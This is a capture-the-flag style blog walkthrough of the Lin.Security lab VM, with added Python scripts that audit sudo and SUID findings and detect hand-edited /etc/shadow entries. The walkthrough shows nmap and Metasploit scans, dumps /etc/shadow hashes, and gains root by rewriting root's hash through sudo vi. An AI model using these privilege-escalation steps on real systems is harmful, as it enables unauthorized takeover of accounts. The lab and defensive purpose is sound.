Lin.Security 1
I'm going to try to finish my initial VM list from way back when I started this blog within the next week and move on to learning some Windows shit. It's 2021 and still, most corporate networks are using Windows.
Recon
- VM published 11 Jul, 2018
- Author is a Pentesting company, website still up and appears to be active
- They give us initial credentials on their website:
bob/secret
- Image is Ubuntu 18.04 LTS. I'm assuming that if they give us initial credentials, this one actually isn't going to be a web attack!
Enumeration
└─$ sudo nmap -nP 10.10.10.0/24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-28 11:46 EST
Nmap scan report for 10.10.10.1
Host is up (0.000079s latency).
All 1000 scanned ports on 10.10.10.1 are filtered
MAC Address: 08:00:27:64:8F:E2 (Oracle VirtualBox virtual NIC)
Nmap scan report for 10.10.10.6
Host is up (0.000064s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
2049/tcp open nfs
MAC Address: 08:00:27:D8:9F:D6 (Oracle VirtualBox virtual NIC)
Nmap scan report for 10.10.10.4
Host is up (0.0000020s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.25 seconds
Alright well, it looks like we have a little more than just an ssh login - nfs is always fun! I suppose I'll make sure to try every path I see and at least start a scanner against this:
msf6 > search nfs
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/freebsd/nfsd/nfsd_mount normal No FreeBSD Remote NFS RPC Request Denial of Service
1 auxiliary/scanner/nfs/nfsmount normal No NFS Mount Scanner
2 exploit/netware/sunrpc/pkernel_callit 2009-09-30 good No NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow
3 exploit/osx/local/nfs_mount_root 2014-04-11 normal Yes Mac OS X NFS Mount Privilege Escalation Exploit
4 exploit/windows/ftp/labf_nfsaxe 2017-05-15 normal No LabF nfsAxe 3.7 FTP Client Stack Buffer Overflow
5 exploit/windows/ftp/xlink_client 2009-10-03 normal No Xlink FTP Client Buffer Overflow
6 exploit/windows/ftp/xlink_server 2009-10-03 good Yes Xlink FTP Server Buffer Overflow
7 exploit/windows/nfs/xlink_nfsd 2006-11-06 average No Omni-NFS Server Buffer Overflow
Interact with a module by name or index. For example info 7, use 7 or use exploit/windows/nfs/xlink_nfsd
msf6 > use 1
msf6 auxiliary(scanner/nfs/nfsmount) > info
Name: NFS Mount Scanner
Module: auxiliary/scanner/nfs/nfsmount
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
tebo <tebo@attackresearch.com>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PROTOCOL udp yes The protocol to use (Accepted: udp, tcp)
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 111 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
Description:
This module scans NFS mounts and their permissions.
References:
https://cvedetails.com/cve/CVE-1999-0170/
http://www.ietf.org/rfc/rfc1094.txt
msf6 auxiliary(scanner/nfs/nfsmount) > set RHOSTS 10.10.10.6
RHOSTS => 10.10.10.6
msf6 auxiliary(scanner/nfs/nfsmount) > run
[+] 10.10.10.6:111 - 10.10.10.6 NFS Export: /home/peter [*]
[*] 10.10.10.6:111 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Let's now log in to the machine with our given credentials and poke around a bit:
$ ssh bob@10.10.10.6
Cool banner!
bob@linsecurity:~$ ls -al
total 28
drwxr-xr-x 4 bob bob 4096 Jul 10 2018 .
drwxr-xr-x 5 root root 4096 Jul 9 2018 ..
-rw-r--r-- 1 bob bob 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 bob bob 3771 Apr 4 2018 .bashrc
drwx------ 2 bob bob 4096 Jul 9 2018 .cache
-rw-rw-r-- 1 bob bob 0 Jul 9 2018 .cloud-locale-test.skip
drwx------ 3 bob bob 4096 Jul 9 2018 .gnupg
-rw-r--r-- 1 bob bob 807 Apr 4 2018 .profile
Nothing interesting in the home directory.
bob@linsecurity:~$ sudo -l
[sudo] password for bob:
Matching Defaults entries for bob on linsecurity:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User bob may run the following commands on linsecurity:
(ALL) /bin/ash, /usr/bin/awk, /bin/bash, /bin/sh, /bin/csh, /usr/bin/curl, /bin/dash, /bin/ed, /usr/bin/env, /usr/bin/expect, /usr/bin/find, /usr/bin/ftp,
/usr/bin/less, /usr/bin/man, /bin/more, /usr/bin/scp, /usr/bin/socat, /usr/bin/ssh, /usr/bin/vi, /usr/bin/zsh, /usr/bin/pico, /usr/bin/rvim,
/usr/bin/perl, /usr/bin/tclsh, /usr/bin/git, /usr/bin/script, /usr/bin/scp
Oh sweet jesus, that's a lot of GTFOBins we can run as root... Do any of them have SUID set?
bob@linsecurity:/$ find . -user root -perm -4000 -exec ls -ldb {} \; >/tmp/filename
...
bob@linsecurity:/$ cat /tmp/filename
-rwsr-xr-x 1 root root 40152 Nov 30 2017 ./snap/core/4917/bin/mount
-rwsr-xr-x 1 root root 44168 May 7 2014 ./snap/core/4917/bin/ping
-rwsr-xr-x 1 root root 44680 May 7 2014 ./snap/core/4917/bin/ping6
-rwsr-xr-x 1 root root 40128 May 17 2017 ./snap/core/4917/bin/su
-rwsr-xr-x 1 root root 27608 Nov 30 2017 ./snap/core/4917/bin/umount
-rwsr-xr-x 1 root root 71824 May 17 2017 ./snap/core/4917/usr/bin/chfn
-rwsr-xr-x 1 root root 40432 May 17 2017 ./snap/core/4917/usr/bin/chsh
-rwsr-xr-x 1 root root 75304 May 17 2017 ./snap/core/4917/usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 May 17 2017 ./snap/core/4917/usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 May 17 2017 ./snap/core/4917/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Jul 4 2017 ./snap/core/4917/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jan 12 2017 ./snap/core/4917/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Jan 18 2018 ./snap/core/4917/usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 root root 98440 Jun 21 2018 ./snap/core/4917/usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 390888 Jan 29 2016 ./snap/core/4917/usr/sbin/pppd
-rwsr-xr-x 1 root root 40152 Nov 30 2017 ./snap/core/4486/bin/mount
-rwsr-xr-x 1 root root 44168 May 7 2014 ./snap/core/4486/bin/ping
-rwsr-xr-x 1 root root 44680 May 7 2014 ./snap/core/4486/bin/ping6
-rwsr-xr-x 1 root root 40128 May 17 2017 ./snap/core/4486/bin/su
-rwsr-xr-x 1 root root 27608 Nov 30 2017 ./snap/core/4486/bin/umount
-rwsr-xr-x 1 root root 71824 May 17 2017 ./snap/core/4486/usr/bin/chfn
-rwsr-xr-x 1 root root 40432 May 17 2017 ./snap/core/4486/usr/bin/chsh
-rwsr-xr-x 1 root root 75304 May 17 2017 ./snap/core/4486/usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 May 17 2017 ./snap/core/4486/usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 May 17 2017 ./snap/core/4486/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Jul 4 2017 ./snap/core/4486/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jan 12 2017 ./snap/core/4486/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Jan 18 2018 ./snap/core/4486/usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 root root 94344 Apr 16 2018 ./snap/core/4486/usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 390888 Jan 29 2016 ./snap/core/4486/usr/sbin/pppd
-rwsr-xr-x 1 root root 64424 Mar 9 2017 ./bin/ping
-rwsr-xr-x 1 root root 30800 Aug 11 2016 ./bin/fusermount
-rwsr-xr-x 1 root root 26696 May 16 2018 ./bin/umount
-rwsr-xr-x 1 root root 146128 Nov 30 2017 ./bin/ntfs-3g
-rwsr-xr-x 1 root root 44664 Jan 25 2018 ./bin/su
-rwsr-xr-x 1 root root 43088 May 16 2018 ./bin/mount
-rwsr-xr-x 1 root root 22520 Mar 27 2018 ./usr/bin/pkexec
-rwsr-xr-x 1 root root 18640 Oct 27 2016 ./usr/bin/netkit-rlogin
-rwsr-x--- 1 root itservices 18552 Apr 10 2018 ./usr/bin/xxd
-rwsr-xr-x 1 root root 37136 Jan 25 2018 ./usr/bin/newgidmap
-rwsr-xr-x 1 root root 40344 Jan 25 2018 ./usr/bin/newgrp
-rwsr-xr-x 1 root root 149080 Jan 18 2018 ./usr/bin/sudo
-rwsr-xr-x 1 root root 22728 Oct 27 2016 ./usr/bin/netkit-rcp
-rwsr-xr-x 1 root root 76496 Jan 25 2018 ./usr/bin/chfn
-rwsr-xr-x 1 root root 75824 Jan 25 2018 ./usr/bin/gpasswd
-rwsr-xr-x 1 root root 44528 Jan 25 2018 ./usr/bin/chsh
-rwsr-xr-x 1 root root 18448 Mar 9 2017 ./usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 37136 Jan 25 2018 ./usr/bin/newuidmap
-rwsr-xr-x 1 root root 14504 Oct 27 2016 ./usr/bin/netkit-rsh
-rwsr-sr-x 1 root root 30800 May 16 2018 ./usr/bin/taskset
-rwsr-xr-x 1 root root 59640 Jan 25 2018 ./usr/bin/passwd
-rwsr-xr-x 1 root root 10232 Mar 28 2017 ./usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 42992 Nov 15 2017 ./usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 80056 Jun 5 2018 ./usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 436552 Feb 10 2018 ./usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 14328 Mar 27 2018 ./usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-sr-x 1 root root 101208 May 16 2018 ./usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 113336 Jan 16 2018 ./sbin/mount.nfs
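A small audit script for this step (an added example, not part of the original write-up or of the VM): it parses the sudo -l output and the SUID listing above, groups the sudo-allowed binaries by why each one is root-equivalent, answers the "do any of them have SUID set?" question by intersecting the two lists, and pulls out SUID binaries that only a specific group can run (xxd with group itservices here, which makes membership in that group worth reviewing). The category table is my own grouping, and the SUID input is an excerpt of the listing; both are embedded inline.

```python
"""Audit helpers for the two findings above: the `sudo -l` command list and
the SUID listing. Added example; sample input is copied from the write-up."""
import os
import re
from typing import Dict, List, Set

# sudo -l output from above (inline copy; raw string because of the \: in secure_path).
SUDO_L_OUTPUT = r"""Matching Defaults entries for bob on linsecurity:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User bob may run the following commands on linsecurity:
    (ALL) /bin/ash, /usr/bin/awk, /bin/bash, /bin/sh, /bin/csh, /usr/bin/curl, /bin/dash, /bin/ed, /usr/bin/env, /usr/bin/expect, /usr/bin/find, /usr/bin/ftp,
    /usr/bin/less, /usr/bin/man, /bin/more, /usr/bin/scp, /usr/bin/socat, /usr/bin/ssh, /usr/bin/vi, /usr/bin/zsh, /usr/bin/pico, /usr/bin/rvim,
    /usr/bin/perl, /usr/bin/tclsh, /usr/bin/git, /usr/bin/script, /usr/bin/scp
"""

# Excerpt of the SUID listing from above (inline copy, nine representative lines).
SUID_LISTING = """-rwsr-xr-x 1 root root 44664 Jan 25 2018 ./bin/su
-rwsr-xr-x 1 root root 43088 May 16 2018 ./bin/mount
-rwsr-xr-x 1 root root 22520 Mar 27 2018 ./usr/bin/pkexec
-rwsr-x--- 1 root itservices 18552 Apr 10 2018 ./usr/bin/xxd
-rwsr-xr-x 1 root root 149080 Jan 18 2018 ./usr/bin/sudo
-rwsr-xr-x 1 root root 59640 Jan 25 2018 ./usr/bin/passwd
-rwsr-xr-- 1 root messagebus 42992 Nov 15 2017 ./usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-sr-x 1 root root 101208 May 16 2018 ./usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 390888 Jan 29 2016 ./usr/sbin/pppd
"""

# Why each sudo-allowed binary matters when it runs as root (my own grouping).
CATEGORY = {
    **{b: "shell" for b in ("ash", "bash", "sh", "csh", "dash", "zsh")},
    **{b: "editor" for b in ("vi", "rvim", "pico", "ed")},
    **{b: "pager" for b in ("less", "more", "man")},
    **{b: "interpreter" for b in ("awk", "perl", "tclsh", "expect", "env", "find",
                                  "script", "git", "socat", "ssh")},
    **{b: "file transfer" for b in ("curl", "scp", "ftp")},
}

# Strips the "(ALL)" run-as part and any "NOPASSWD:"-style tags from a rule line.
RUNAS_PREFIX = re.compile(r"^\s*\([^)]*\)\s*(?:[A-Z]+:\s*)*")


def parse_sudo_l(text: str) -> List[str]:
    """Return the command paths granted in the 'may run the following commands' block."""
    cmds: List[str] = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        for entry in RUNAS_PREFIX.sub("", line).split(","):
            entry = entry.strip()
            if entry:
                cmds.append(entry.split()[0])  # keep the path, drop any argument restriction
    return cmds


def flag_sudo_rules(cmds: List[str]) -> Dict[str, str]:
    """Map each granted command to the reason it is root-equivalent; 'ALL' is unrestricted."""
    flagged: Dict[str, str] = {}
    for cmd in cmds:
        if cmd == "ALL":
            flagged[cmd] = "unrestricted"
            continue
        category = CATEGORY.get(os.path.basename(cmd))
        if category:
            flagged[cmd] = category
    return flagged


def parse_suid_listing(text: str) -> List[Dict[str, object]]:
    """Parse `ls -l` lines into dicts; './x' paths (find run from /) become '/x'."""
    entries: List[Dict[str, object]] = []
    for line in text.splitlines():
        parts = line.split(None, 8)
        if len(parts) != 9 or not parts[0].startswith("-"):
            continue
        mode, _links, owner, group, _size, _mon, _day, _year, path = parts
        entries.append({
            "path": path[1:] if path.startswith("./") else path,
            "owner": owner,
            "group": group,
            "setuid": mode[3] in "sS",       # user execute slot carries the setuid bit
            "setgid": mode[6] in "sS",       # group execute slot carries the setgid bit
            "others_exec": mode[9] == "x",   # can a user outside the group even run it?
        })
    return entries


def group_restricted_suid(entries: List[Dict[str, object]]) -> List[str]:
    """SUID root binaries that ordinary users cannot execute but a named group can."""
    return [str(e["path"]) for e in entries if e["setuid"] and not e["others_exec"]]


def sudo_commands_with_suid(cmds: List[str], entries: List[Dict[str, object]]) -> Set[str]:
    """The question from the write-up: do any sudo-allowed commands also carry SUID?"""
    suid_paths = {str(e["path"]) for e in entries if e["setuid"]}
    return set(cmds) & suid_paths


if __name__ == "__main__":
    cmds = parse_sudo_l(SUDO_L_OUTPUT)
    for cmd, why in flag_sudo_rules(cmds).items():
        print(f"sudo {cmd:<28} {why}")
    entries = parse_suid_listing(SUID_LISTING)
    print("group-restricted SUID:", group_restricted_suid(entries))
    print("sudo commands that are also SUID:", sudo_commands_with_suid(cmds, entries) or "none")
```

On this box the intersection is empty (none of the sudo-allowed commands is itself SUID), every one of the 26 distinct sudo entries lands in a root-equivalent category, and xxd shows up as the one SUID binary gated on a non-system group.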
We can run an editor as root though, so this means we have full read access to the entire system. Let's use that to dig a bit deeper, shall we?
$ sudo vi /etc/shadow
root:$6$aorWKpxj$yOgku4F1ZRbqvSxxUtAYY2/6K/UU5wLobTSz/Pw5/ILvXgq9NibQ0/NQbOr1Wzp2bTbpNQr1jNNlaGjXDu5Yj1:17721:0:99999:7:::
daemon:*:17647:0:99999:7:::
bin:*:17647:0:99999:7:::
sys:*:17647:0:99999:7:::
sync:*:17647:0:99999:7:::
games:*:17647:0:99999:7:::
man:*:17647:0:99999:7:::
lp:*:17647:0:99999:7:::
mail:*:17647:0:99999:7:::
news:*:17647:0:99999:7:::
uucp:*:17647:0:99999:7:::
proxy:*:17647:0:99999:7:::
www-data:*:17647:0:99999:7:::
backup:*:17647:0:99999:7:::
list:*:17647:0:99999:7:::
irc:*:17647:0:99999:7:::
gnats:*:17647:0:99999:7:::
nobody:*:17647:0:99999:7:::
systemd-network:*:17647:0:99999:7:::
systemd-resolve:*:17647:0:99999:7:::
syslog:*:17647:0:99999:7:::
messagebus:*:17647:0:99999:7:::
_apt:*:17647:0:99999:7:::
lxd:*:17647:0:99999:7:::
uuidd:*:17647:0:99999:7:::
dnsmasq:*:17647:0:99999:7:::
landscape:*:17647:0:99999:7:::
pollinate:*:17647:0:99999:7:::
sshd:*:17647:0:99999:7:::
pkexecbob:$6$Kk0DA.6Xha4nL2p5$jq7qoit2l4ckULg1ZxcbL5wUz2Ld2ZUa.RYaIMs.Lma0EFGheX9yCXfKy37K0GsHz50FYIqIESo4QXWL.DYTI0:17721:0:99999:7:::
statd:*:17721:0:99999:7:::
peter:$6$QpjS4vUG$Zi1KcJ7cRB8TJG9A/x7GhQQvJ0RoYwG4Jxj/6R58SJddU2X/QTQKNJWzwiByeTELKeyp0vS83kPsYITbTTmlb0:17721:0:99999:7:::
susan:$6$5oSmml7K$0joeavcuzw4qxDJ2LsD1ablUIrFhycVoIXL3rxN/3q2lVpQOKLufta5tqMRIh30Gb32IBp5yZ7XvBR6uX9/SR/:17721:0:99999:7:::
Recap
- SSH on port 22
- nfs on port 2049
- rpcbind on 111
- There's an NFS mount at /home/peter
- We can run quite a few commands as root (including an editor); this should be very useful for us
Exploitation
I should be able to just edit /etc/shadow to set my own password for root...
# Create a sha-512 hashed password:
$ mkpasswd -m sha-512 -S saltsalt -s
Password: password
$6$saltsalt$qFmFH.bQmmtXzyBY0s9v7Oicd2z4XSIecDzlB5KiA2/jctKu9YterLp8wwnSq.qc.eoxqOmSuNp2xS0ktL3nh/
bob@linsecurity:/$ sudo vi /etc/shadow
... changed root hash line to:
root:$6$saltsalt$qFmFH.bQmmtXzyBY0s9v7Oicd2z4XSIecDzlB5KiA2/jctKu9YterLp8wwnSq.qc.eoxqOmSuNp2xS0ktL3nh/:17721:0:99999:7:::
# Login with password password
bob@linsecurity:/$ su
Password:
root@linsecurity:/# id
uid=0(root) gid=0(root) groups=0(root)
We win! There's probably a ton of ways to win this one, but I don't really care; I just want quick roots to finish off these Linux boxes. EASY!
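What a defender could look for after this: the edit leaves a tell, because passwd updates the third shadow field (days since 1970-01-01 of the last change) while a hand edit with vi does not, so the root hash changes but the date stays at 17721. The script below is an added example, not from the write-up: it diffs two snapshots of /etc/shadow and flags exactly that pattern, plus locked accounts that suddenly gain a usable hash. The root lines are the before/after from above; the other lines are a constructed excerpt.

```python
"""Added example: detect hand-edited /etc/shadow entries by diffing two snapshots.
The root lines are the before/after from the write-up; other lines are constructed."""
from datetime import date, timedelta
from typing import Dict, List, NamedTuple


class ShadowEntry(NamedTuple):
    user: str
    hash: str
    lastchg: int  # days since 1970-01-01; passwd(1) updates it, a manual vi edit does not


# Snapshot before the edit (root hash as originally found).
BEFORE = """root:$6$aorWKpxj$yOgku4F1ZRbqvSxxUtAYY2/6K/UU5wLobTSz/Pw5/ILvXgq9NibQ0/NQbOr1Wzp2bTbpNQr1jNNlaGjXDu5Yj1:17721:0:99999:7:::
daemon:*:17647:0:99999:7:::
peter:$6$QpjS4vUG$Zi1KcJ7cRB8TJG9A/x7GhQQvJ0RoYwG4Jxj/6R58SJddU2X/QTQKNJWzwiByeTELKeyp0vS83kPsYITbTTmlb0:17721:0:99999:7:::
"""

# Snapshot after the edit (root hash replaced, lastchg untouched).
AFTER = """root:$6$saltsalt$qFmFH.bQmmtXzyBY0s9v7Oicd2z4XSIecDzlB5KiA2/jctKu9YterLp8wwnSq.qc.eoxqOmSuNp2xS0ktL3nh/:17721:0:99999:7:::
daemon:*:17647:0:99999:7:::
peter:$6$QpjS4vUG$Zi1KcJ7cRB8TJG9A/x7GhQQvJ0RoYwG4Jxj/6R58SJddU2X/QTQKNJWzwiByeTELKeyp0vS83kPsYITbTTmlb0:17721:0:99999:7:::
"""


def parse_shadow(text: str) -> Dict[str, ShadowEntry]:
    """Parse shadow(5) lines into user -> (user, hash, lastchg)."""
    entries: Dict[str, ShadowEntry] = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 3:
            continue
        lastchg = int(fields[2]) if fields[2] else -1  # empty field means "never changed"
        entries[fields[0]] = ShadowEntry(fields[0], fields[1], lastchg)
    return entries


def lastchg_to_date(days: int) -> date:
    """Convert the shadow 'days since epoch' field to a calendar date."""
    return date(1970, 1, 1) + timedelta(days=days)


def is_locked(hash_field: str) -> bool:
    """'*' and '!'-prefixed hashes never match any password."""
    return hash_field.startswith(("*", "!"))


def diff_shadow(before: str, after: str) -> List[str]:
    """One finding per line: added/removed accounts, changed hashes, unlocked accounts."""
    old, new = parse_shadow(before), parse_shadow(after)
    findings: List[str] = []
    for user, entry in new.items():
        prev = old.get(user)
        if prev is None:
            findings.append(f"{user}: account added")
            continue
        if entry.hash != prev.hash:
            when = lastchg_to_date(entry.lastchg)
            if entry.lastchg == prev.lastchg:
                # passwd would have bumped lastchg to today; an unchanged value means
                # the hash field was written some other way (editor, script, restore).
                findings.append(f"{user}: hash changed but lastchg still {when}: manual edit, not passwd")
            else:
                findings.append(f"{user}: hash changed via password change on {when}")
        if is_locked(prev.hash) and not is_locked(entry.hash):
            findings.append(f"{user}: previously locked account now has a usable password")
    for user in old.keys() - new.keys():
        findings.append(f"{user}: account removed")
    return findings


if __name__ == "__main__":
    for finding in diff_shadow(BEFORE, AFTER):
        print(finding)
```

Run against the two snapshots it reports a single line for root: the hash changed while lastchg still says 2018-07-09 (the day the VM was built, matching the file dates in bob's home directory), which is the signature of a direct file edit rather than a passwd run. In practice you would feed it a baseline copy of the file and the live one, or hook the same comparison into whatever file-integrity tooling already watches /etc/shadow.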